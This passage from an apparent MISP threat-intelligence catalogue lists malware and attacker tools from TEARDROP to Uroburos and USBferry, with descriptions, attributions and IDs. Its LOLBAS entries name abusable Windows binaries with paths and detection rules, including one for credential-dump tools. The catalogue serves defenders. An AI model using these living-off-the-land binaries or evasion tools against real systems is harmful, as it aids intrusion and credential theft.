tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TEARDROP
TEARDROP is a memory-only dropper that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was likely used by APT29 since at least May 2020.[FireEye SUNBURST Backdoor December 2020][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID bae20f59-469c-451c-b4ca-70a9a04a1574
which can be used as unique global reference for TEARDROP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0560 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Teleport
Teleport is a custom tool for data exfiltration. It has been observed in use during intrusions involving Truebot, a botnet and loader malware, in 2022 and 2023.[U.S. CISA Increased Truebot Activity July 6 2023]
Internal MISP references
UUID b9a98499-c984-4199-ae64-d1381ebbaa1f
which can be used as unique global reference for Teleport
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5011 |
source | Tidal Cyber |
tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Terminator
Terminator is an open-source software package that is designed to facilitate disabling of endpoint security/antivirus tools by abusing the zam64.sys driver.[GitHub Terminator]
Internal MISP references
UUID 5cd0db7a-d47d-479b-89ac-9e78dfc0cd9d
which can be used as unique global reference for Terminator
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5283 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TestWindowRemoteAgent
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
Author: Onat Uzunyayla
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
Resources: None Provided
Detection: * IOC: TestWindowRemoteAgent.exe spawning unexpectedly[TestWindowRemoteAgent.exe - LOLBAS Project]
Internal MISP references
UUID 2143f749-d7b8-43c0-8041-8aeb486142c2
which can be used as unique global reference for TestWindowRemoteAgent
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5241 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
TEXTMATE
TEXTMATE is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with POWERSOURCE in February 2017. [FireEye FIN7 March 2017]
Internal MISP references
UUID 49d0ae81-d51b-4534-b1e0-08371a47ef79
which can be used as unique global reference for TEXTMATE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0146 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
ThiefQuest
ThiefQuest is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. ThiefQuest was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.[Reed thiefquest fake ransom] Even though ThiefQuest presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.[wardle evilquest partii][reed thiefquest ransomware analysis]
Internal MISP references
UUID 2ed5f691-68eb-49dd-b730-793dc8a7d134
which can be used as unique global reference for ThiefQuest
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0595 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
ThreatNeedle
ThreatNeedle is a backdoor that has been used by Lazarus Group since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of Lazarus Group's Manuscrypt (a.k.a. NukeSped) malware family.[Kaspersky ThreatNeedle Feb 2021]
Internal MISP references
UUID b31c7b8e-dbdd-4ad5-802e-dcdc72b7462e
which can be used as unique global reference for ThreatNeedle
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0665 |
source | MITRE |
type | ['malware'] |
ThunderShell
ThunderShell is a tool used to facilitate remote access via HTTP requests.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 8fe38eda-30be-4c88-ae76-ac6ebc89d66b
which can be used as unique global reference for ThunderShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5045 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'be319849-fb2c-4b5f-8055-0bde562c280b', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
TightVNC
According to its project page, TightVNC is a free and open-source remote desktop software tool that is Virtual Network Computing (VNC)-compatible. It is designed to enable remote access to other systems.[TightVNC Software Project Page]
Internal MISP references
UUID 6b0d5be9-5305-4b45-bed9-43dee66b85e8
which can be used as unique global reference for TightVNC
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5015 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
TinyTurla
TinyTurla is a backdoor that has been used by Turla against targets in the US, Germany, and Afghanistan since at least 2020.[Talos TinyTurla September 2021]
Internal MISP references
UUID 39f0371c-b755-4655-a97e-82a572f2fae4
which can be used as unique global reference for TinyTurla
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0668 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
TINYTYPHON
TINYTYPHON is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. [Forcepoint Monsoon]
Internal MISP references
UUID 0e009cb8-848e-427a-9581-d3a4fd9f6a87
which can be used as unique global reference for TINYTYPHON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0131 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
TinyZBot
TinyZBot is a bot written in C# that was developed by Cleaver. [Cylance Cleaver]
Internal MISP references
UUID 277290fe-51f3-4822-bb46-8b69fd1c8ae5
which can be used as unique global reference for TinyZBot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0004 |
source | MITRE |
type | ['malware'] |
Tomiris
Tomiris is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between Tomiris and GoldMax.[Kaspersky Tomiris Sep 2021]
Internal MISP references
UUID eff417ad-c775-4a95-9f36-a1b5a675ba82
which can be used as unique global reference for Tomiris
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0671 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Tor
Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. [Dingledine Tor The Second-Generation Onion Router]
Internal MISP references
UUID 8c70d85b-b06d-423c-8bab-ecff18f332d6
which can be used as unique global reference for Tor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0183 |
source | MITRE |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'be319849-fb2c-4b5f-8055-0bde562c280b', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Torisma
Torisma is a second stage implant designed for specialized monitoring that has been used by Lazarus Group. Torisma was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.[McAfee Lazarus Nov 2020]
Internal MISP references
UUID 4bce135b-91ba-45ae-88f9-09e01f983a74
which can be used as unique global reference for Torisma
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0678 |
source | MITRE |
type | ['malware'] |
Tracker
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft .Net Framework.
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/subTee/status/793151392185589760 * https://attack.mitre.org/wiki/Execution
Detection: * Sigma: proc_creation_win_lolbin_tracker.yml[LOLBAS Tracker]
Internal MISP references
UUID 62ebde4b-4936-49f6-842b-8c0313ea26f5
which can be used as unique global reference for Tracker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5242 |
source | Tidal Cyber |
tags | ['3c9b26cf-9bda-4feb-ab42-ef7865cc80fd', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
TrailBlazer
TrailBlazer is a modular malware that has been used by APT29 since at least 2019.[CrowdStrike StellarParticle January 2022]
Internal MISP references
UUID 7a6ae9f8-5f8b-4e94-8716-d8ee82027197
which can be used as unique global reference for TrailBlazer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0682 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
TrickBot
TrickBot is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to Dyre. TrickBot was developed and initially used by Wizard Spider for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.[S2 Grupo TrickBot June 2017][Fidelis TrickBot Oct 2016][IBM TrickBot Nov 2016][CrowdStrike Wizard Spider October 2020]
Internal MISP references
UUID c2bd4213-fc7b-474f-b5a0-28145b07c51d
which can be used as unique global reference for TrickBot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0266 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Trojan.Karagany
Trojan.Karagany is a modular remote access tool used for recon and linked to Dragonfly. The source code for Trojan.Karagany originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. [Symantec Dragonfly][Secureworks Karagany July 2019][Dragos DYMALLOY]
Internal MISP references
UUID b88c4891-40da-4832-ba42-6c6acd455bd1
which can be used as unique global reference for Trojan.Karagany
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0094 |
source | MITRE |
type | ['malware'] |
Trojan.Mebromi
Trojan.Mebromi is BIOS-level malware that takes control of the victim system before the MBR is loaded. [Ge 2011]
Internal MISP references
UUID f8a4213d-633b-4e3d-8e59-a769e852b93b
which can be used as unique global reference for Trojan.Mebromi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0001 |
source | MITRE |
type | ['malware'] |
Truebot
Truebot is a botnet often used as a loader for other malware. In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new Truebot variants infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 (a vulnerability in the IT auditing application Netwrix Auditor) to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections; FlawedGrace and Cobalt Strike for various post-exploitation activities; and Teleport, a custom tool for data exfiltration.[U.S. CISA Increased Truebot Activity July 6 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.silence
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/truebot/
PulseDive (IOCs): https://pulsedive.com/threat/Truebot
Internal MISP references
UUID 669f8b7a-2404-47ab-843d-e63431faafec
which can be used as unique global reference for Truebot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5000 |
source | Tidal Cyber |
tags | ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'a98d7a43-f227-478e-81de-e7299639a355', '992bdd33-4a47-495d-883a-58010a2f0efb', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Truvasys
Truvasys is first-stage malware that has been used by PROMETHIUM. It is a collection of modules written in the Delphi programming language. [Microsoft Win Defender Truvasys Sep 2017] [Microsoft NEODYMIUM Dec 2016] [Microsoft SIR Vol 21]
Internal MISP references
UUID 50844dba-8999-42ba-ba29-511e3faf4bc3
which can be used as unique global reference for Truvasys
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0178 |
source | MITRE |
type | ['malware'] |
TSCookie
TSCookie is a remote access tool (RAT) that has been used by BlackTech in campaigns against Japanese targets.[JPCert TSCookie March 2018][JPCert BlackTech Malware September 2019] TSCookie has been referred to as PLEAD, though more recent reporting indicates a separation between the two.[JPCert PLEAD Downloader June 2018][JPCert BlackTech Malware September 2019]
Internal MISP references
UUID 9872ab5a-c76e-4404-91f9-5b745722443b
which can be used as unique global reference for TSCookie
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0436 |
source | MITRE |
type | ['malware'] |
TShark
TShark is a network protocol analyzer utility.
Internal MISP references
UUID 57f9458f-4dad-411e-9971-8e3e166f173b
which can be used as unique global reference for TShark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5268 |
source | Tidal Cyber |
tags | ['e1be4b53-7524-4e88-bf6d-358cfdf96772', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Ttdinject
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Author: Maxime Nadeau
Paths: * C:\Windows\System32\ttdinject.exe * C:\Windows\Syswow64\ttdinject.exe
Resources: * https://twitter.com/Oddvarmoe/status/1196333160470138880
Detection:
* Sigma: create_remote_thread_win_ttdinjec.yml
* Sigma: proc_creation_win_lolbin_ttdinject.yml
* IOC: Parent-child relationship: Ttdinject.exe as parent of the executed command
* IOC: Multiple queries made to the IFEO registry key of an untrusted executable (e.g. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
[Ttdinject.exe - LOLBAS Project]
Internal MISP references
UUID 7bd9859e-4260-4c86-903b-1f8bcf658da1
which can be used as unique global reference for Ttdinject
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5168 |
source | Tidal Cyber |
tags | ['fc67aea7-f207-4cf5-8413-e33c76538cf6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Tttracer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows 1809 and newer to Debug Time Travel
Author: Oddvar Moe
Paths: * C:\Windows\System32\tttracer.exe * C:\Windows\SysWOW64\tttracer.exe
Resources:
* https://twitter.com/oulusoyum/status/1191329746069655553
* https://twitter.com/mattifestation/status/1196390321783025666
* https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html
Detection:
* Sigma: proc_creation_win_lolbin_tttracer_mod_load.yml
* Sigma: image_load_tttracer_mod_load.yml
* Elastic: credential_access_cmdline_dump_tool.toml
* IOC: Parent-child relationship: Tttracer as parent of the executed command
[Tttracer.exe - LOLBAS Project]
Internal MISP references
UUID ab06ccb0-21c7-4d84-99ff-3349ce476910
which can be used as unique global reference for Tttracer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5169 |
source | Tidal Cyber |
tags | ['3c4e3160-4e82-49ce-b6a3-17879dd4b83c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Turian
Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.[ESET BackdoorDiplomacy Jun 2021]
Internal MISP references
UUID 571a45a7-68c9-452c-99bf-1d5b5fdd08b3
which can be used as unique global reference for Turian
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0647 |
source | MITRE |
type | ['malware'] |
TURNEDUP
TURNEDUP is a non-public backdoor. It has been dropped by APT33's StoneDrill malware. [FireEye APT33 Sept 2017] [FireEye APT33 Webinar Sept 2017]
Internal MISP references
UUID c7f10715-cf13-4360-8511-aa3f93dd7688
which can be used as unique global reference for TURNEDUP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0199 |
source | MITRE |
type | ['malware'] |
TYPEFRAME
TYPEFRAME is a remote access tool that has been used by Lazarus Group. [US-CERT TYPEFRAME June 2018]
Internal MISP references
UUID 6c93d3c4-cae5-48a9-948d-bc5264230316
which can be used as unique global reference for TYPEFRAME
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0263 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
UACMe
UACMe is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. [Github UACMe]
Internal MISP references
UUID 5788edee-d1b7-4406-9122-bee596362236
which can be used as unique global reference for UACMe
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0116 |
source | MITRE |
tags | ['7de7d799-f836-4555-97a4-0db776eb6932', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
UBoatRAT
UBoatRAT is a remote access tool that was identified in May 2017.[PaloAlto UBoatRAT Nov 2017]
Internal MISP references
UUID 5214ae01-ccd5-4e97-8f9c-14eb16e75544
which can be used as unique global reference for UBoatRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0333 |
source | MITRE |
type | ['malware'] |
Umbreon
A Linux rootkit that provides backdoor access and hides from defenders.
Internal MISP references
UUID 227c12df-8126-4e79-b9bd-0e4633fa12fa
which can be used as unique global reference for Umbreon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0221 |
source | MITRE |
type | ['malware'] |
Universal Virus Sniffer
Universal Virus Sniffer is a tool that can be used for impairing and evading an environment's defenses.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID d876bb61-3122-44e7-ace4-f473a7b30f58
which can be used as unique global reference for Universal Virus Sniffer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5276 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
type | ['tool'] |
Unknown Logger
Unknown Logger is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. [Forcepoint Monsoon]
Internal MISP references
UUID 846b3762-3949-4501-b781-6dca22db088f
which can be used as unique global reference for Unknown Logger
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0130 |
source | MITRE |
type | ['malware'] |
Unregmp2
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Windows Media Player Setup Utility
Author: Wade Hickey
Paths: * C:\Windows\System32\unregmp2.exe * C:\Windows\SysWOW64\unregmp2.exe
Resources: * https://twitter.com/notwhickey/status/1466588365336293385
Detection:
* Sigma: proc_creation_win_lolbin_unregmp2.yml
* IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of unregmp2.exe /HideWMP
[Unregmp2.exe - LOLBAS Project]
Internal MISP references
UUID 456fb5b3-76e5-47f4-b964-09d68adb889e
which can be used as unique global reference for Unregmp2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5170 |
source | Tidal Cyber |
tags | ['40f11d0d-09f2-4bd1-bc79-1430464a52a7', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Update
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: Oddvar Moe
Paths: * %localappdata%\Microsoft\Teams\update.exe
Resources:
* https://www.youtube.com/watch?v=rOP3hnkj7ls
* https://twitter.com/reegun21/status/1144182772623269889
* https://twitter.com/MrUn1k0d3r/status/1143928885211537408
* https://twitter.com/reegun21/status/1291005287034281990
* http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
* https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
* https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
* https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/
Detection:
* Sigma: proc_creation_win_lolbin_squirrel.yml
* IOC: Update.exe spawned an unknown process
[Update.exe - LOLBAS Project]
Internal MISP references
UUID 487d4c42-12ee-4c90-b284-cca04dadb951
which can be used as unique global reference for Update
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5243 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
UPPERCUT
UPPERCUT is a backdoor that has been used by menuPass. [FireEye APT10 Sept 2018]
Internal MISP references
UUID a3c211f8-52aa-4bfd-8382-940f2194af28
which can be used as unique global reference for UPPERCUT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0275 |
source | MITRE |
type | ['malware'] |
Url
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Internet Shortcut Shell Extension DLL.
Author: LOLBAS Team
Paths: * c:\windows\system32\url.dll * c:\windows\syswow64\url.dll
Resources:
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/DissectMalware/status/995348436353470465
* https://twitter.com/bohops/status/974043815655956481
* https://twitter.com/yeyint_mth/status/997355558070927360
* https://twitter.com/Hexacorn/status/974063407321223168
* https://windows10dll.nirsoft.net/url_dll.html
Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
[Url.dll - LOLBAS Project]
Internal MISP references
UUID 96e24cc0-f1ce-4595-90c4-5a4976394db8
which can be used as unique global reference for Url
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5200 |
source | Tidal Cyber |
tags | ['34505028-b7d8-4da4-8dee-9926f3dbd37a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Uroburos
Uroburos is a sophisticated cyber espionage tool written in C that has been used by units within Russia's Federal Security Service (FSB) associated with the Turla toolset to collect intelligence on sensitive targets worldwide. Uroburos has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. Uroburos is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. Uroburos has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023][Kaspersky Turla]
Internal MISP references
UUID 89ffc27c-b81f-473a-87d6-907cacdce61c
which can be used as unique global reference for Uroburos
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0022 |
source | MITRE |
tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
type | ['malware'] |
Ursnif
Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[NJCCIC Ursnif Sept 2016][ProofPoint Ursnif Aug 2016] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[TrendMicro Ursnif Mar 2015]
Internal MISP references
UUID 3e501609-87e4-4c47-bd88-5054be0f1037
which can be used as unique global reference for Ursnif
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0386 |
source | MITRE |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
USBferry
USBferry is an information-stealing malware that has been used by Tropic Trooper in targeted attacks against Taiwanese and Philippine air-gapped military environments. USBferry shares an overlapping codebase with YAHOYAH, though it has several features which make it a distinct piece of malware.[TrendMicro Tropic Trooper May 2020]
Internal MISP references
UUID 26d93db8-dbc3-44b5-a393-2b219cef4f5b
which can be used as unique global reference for USBferry
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0452 |
source | MITRE |
type | ['malware'] |
USBStealer
